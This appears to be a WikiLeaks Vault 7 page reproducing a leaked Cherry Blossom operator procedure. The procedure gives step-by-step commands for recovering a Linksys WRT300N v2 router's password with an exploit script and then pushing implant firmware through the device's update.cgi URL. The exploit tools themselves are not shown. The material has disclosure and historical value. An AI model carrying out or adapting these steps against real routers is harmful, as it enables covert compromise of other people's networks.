Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

UNCLASSIFIED
Cherry Bomb Program Cherry Blossom FAT Procedures
persistent data is NOT erased. If a device has CB firmware 'A' on it, then
you upgrade to the manufacturer's original firmware, and then you upgrade
to CB firmware 'B', the persistent data will be erased.
OPERATIONAL PROCEDURES:
The operator must be extremely familiar with the following procedure. Ideally,
the operator will have practiced many times on a test device.
0. It is assumed that the laptop is wirelessly connected to the Linksys
WRT300N v2 running original manufacturer's firmware 2.00.08. The operator
must know:
- The IP address of the Linksys WRT300N v2 (192.168.1.1 by default),
referred to hereafter as <DEVICE IP>. This is usually the
wireless client's default gateway.
- The IP address of the wireless client, referred to hereafter as
<WIRELESS CLIENT IP>. To get this address, from a cygwin shell run:
ipconfig /all
1. Open a cygwin shell, cd to <HOME>/<PACKAGE>, and
run:
perl cisc0wn-2.00.08.pl <DEVICE IP>
In about 15 seconds, the program should return the device's password.
NOTE: the most common case of failure here is running the program against
a device that already is already running a CB firmware. See the
"TROUBLESHOOTING AND DEVICE RECOVERY" section for how to get out of this
situation.
2. From the same cygwin shell, run the following:
./update_server.exe 2313 <SQSH_FILE>
Where <SQSH_FILE> is the .sqsh image to deploy to the device. NOTE that
each <SQSH_FILE> has a corresponding flytrap.config.<SQSH_FILE> that shows
it's configuration. Be sure to specify the appropriate file.
The update_server.exe program should report:
Image Size: nnnnnnnn
Waiting for client connection
3. Open a browser (IE) and go to the following url:
http://<DEVICE IP>/update.cgi?<WIRELESS CLIENT IP>+2313
For example, if the <DEVICE IP> is 192.168.1.1, and the
<WIRELESS CLIENT IP> is 192.168.1.100, go to:
http://192.168.1.1/update.cgi?192.168.1.100+2313
An authentication box should pop up (unless you have previously
authenticated). Enter the password from step 1, and leave the username
field blank.
4. The cygwin shell from step 2 should nearly immediately report:
Connection Accepted
bytesSent nnnnnnnn
Sent nnnnnnnn bytes
At this point the <SQSH_FILE> has been uploaded to the device's RAM, and
writing to flash has begun. Note at this point, the operator can leave.
UNCLASSIFIED
69

e-Highlighter

Click to send permalink to address bar, or right-click to copy permalink.

Un-highlight all Un-highlight selectionu Highlight selectionh